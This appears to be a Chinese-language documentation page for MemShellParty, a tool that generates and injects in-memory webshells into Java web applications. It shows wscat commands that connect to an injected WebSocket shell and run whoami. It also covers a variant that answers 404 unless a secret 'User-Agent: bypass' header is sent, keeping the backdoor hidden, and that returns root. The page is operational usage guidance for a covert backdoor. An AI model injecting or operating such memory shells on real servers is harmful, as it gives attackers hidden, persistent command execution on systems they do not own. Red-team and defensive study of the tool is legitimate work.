MemShellParty
内存马工具

Command

可以让我们执行任意非交互式命令并回显命令结果的内存马。

WebSocket 内存马

生成并注入

选取合适的打包方式,并进行内存马的注入。

使用 WebSocket 客户端尝试连接

我这里使用的是 wscat 工具,使用 npm 就能下载 npm install -g wscat

/app 是应用的路径,/ws-cmd 是上述生成时填的路径。

 wscat -c ws://127.0.0.1:8082/app/ws-cmd
Connected (press CTRL+C to quit)
> whoami
< reajason

>

BypassNginxWebSocket 内存马

生成并注入

选取合适的打包方式,并进行内存马的注入。

使用 WebSocket 客户端尝试连接

我这里使用的是 wscat 工具,使用 npm 就能下载 npm install -g wscat

/app 是应用的路径,/ws-bypass-cmd 是上述生成时填的路径。

我们可以先尝试直接连接,会返回 404 错误,因为 /app/ws-bypass-cmd 路径并不存在。

 wscat -c ws://127.0.0.1/app/ws-bypass-cmd
error: Unexpected server response: 404
> %

紧接着我们加上 Header 的标识来进入我们设置好的 WsBypassValve 逻辑,连接成功!

 wscat -H "User-Agent: bypass" -c ws://127.0.0.1/app/ws-bypass-cmd
Connected (press CTRL+C to quit)
> whoami
< root

>

On this page